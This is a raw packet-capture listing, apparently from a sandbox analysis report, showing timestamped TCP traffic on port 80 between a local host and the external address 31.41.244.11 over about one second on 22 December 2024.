                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766025066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766058922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766108036 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766757965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766895056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766930103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766952038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.766979933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.772948980 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773185015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773220062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773256063 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773293972 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773420095 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773509979 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773545980 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773560047 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.773596048 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.774246931 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.775207043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931077957 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931149006 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931184053 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931188107 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931224108 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931232929 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931232929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931386948 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931405067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931433916 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.931456089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.932089090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.932136059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.932223082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.932240963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.932269096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.932969093 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.933023930 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.933129072 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.933146000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.933171988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.933188915 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.933892012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.933936119 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934015989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934032917 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934067011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934067011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934746027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934793949 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934834003 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934850931 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934871912 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.934884071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.935632944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.935677052 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.935750008 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.935774088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.935796022 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.935811996 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.936568975 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.936608076 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.936614990 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.936628103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.936661005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.936661005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.937421083 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.937561035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.937577963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.937607050 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.937624931 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.938327074 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.938462973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.938479900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.938500881 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.938524961 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.939245939 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.939302921 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.939327955 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.939352036 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.939369917 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.940083027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.940254927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.940272093 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.940300941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.940318108 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.940977097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941076040 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941092968 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941123009 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941864967 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941910982 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941942930 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941960096 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.941987038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.942012072 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.942707062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.942750931 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.942837954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.942856073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.942882061 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.942898035 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.943645954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.943690062 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.943736076 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.943752050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.943778992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.943794966 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.944534063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.944655895 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.944673061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.944706917 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.945420027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.945466042 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.945519924 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.945537090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.945580959 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.946260929 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.946511030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.946527958 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.946554899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.946569920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.947168112 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.947218895 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.947276115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.947293043 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.947329044 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.947329044 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.948115110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.948257923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.948276043 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.948302031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.948332071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.948960066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.949119091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.949134111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.949160099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.949177980 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.949830055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950020075 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950033903 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950052977 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950078011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950092077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950702906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950756073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950812101 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950829983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950856924 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.950880051 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.951647997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.951891899 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.951937914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952028036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952045918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952090979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952800035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952843904 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952896118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952913046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.952955008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.953691959 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.953881025 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.953896999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.953923941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.953938961 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.954658031 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.954762936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.954778910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.954806089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.954833984 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.955471992 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.955629110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.955646038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.955672026 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.955689907 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.956353903 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.956461906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.956479073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.956505060 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.956523895 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.957230091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.957384109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.957400084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.957427025 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.957444906 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.958184004 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.958233118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.958250999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.958277941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.958302975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.959012985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.959220886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.959238052 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.959268093 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.959283113 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965189934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965214968 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965235949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965236902 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965250969 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965275049 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965626955 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965651035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965671062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965675116 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965693951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.965727091 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.966259956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.970029116 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123358011 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123423100 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123440981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123514891 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123538017 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123548031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123589039 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123672009 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123688936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123718977 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.123732090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.124250889 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.124300003 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.124362946 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.124381065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.124428988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.125171900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.125225067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.125241995 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.125273943 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.125288963 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.126008987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.126162052 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.126178980 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.126209974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.126252890 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.126991034 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127008915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127024889 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127048016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127063990 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127787113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127839088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127909899 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127928972 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.127979040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.128710032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.128757954 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.128810883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.128829002 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.128871918 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.129702091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.129719973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.129736900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.129765034 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.129781961 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.130594015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.130610943 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.130628109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.130656958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.130671978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.131366968 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.131431103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.131448030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.131479979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.131496906 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.132251978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.132349968 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.132366896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.132401943 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.132416964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.133128881 CET804976531.41.244.11192.168.2.4
